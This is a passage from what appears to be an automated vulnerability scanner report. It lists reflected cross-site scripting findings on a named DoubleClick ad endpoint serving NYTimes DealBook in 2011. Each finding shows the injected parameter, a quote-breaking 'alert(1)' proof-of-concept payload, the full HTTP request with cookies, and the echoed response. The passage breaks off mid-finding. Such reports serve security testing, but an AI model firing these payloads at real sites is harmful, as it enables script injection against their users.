GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c19"-alert(1)-"574e3fb75c9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ae75'-alert(1)-'db690faebc3 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd16'-alert(1)-'78a5aad6cc9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d645f"-alert(1)-"28e168298f6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cb77"-alert(1)-"c68a3f4ad51 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb377'-alert(1)-'9e6b8a939e3 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3349f'-alert(1)-'d13d8baec0a was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f8e"-alert(1)-"e3926989a12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl
...[SNIP]...

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26706'-alert(1)-'78f402d040 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fffd8"-alert(1)-"2804db10e66 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscU
...[SNIP]...

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

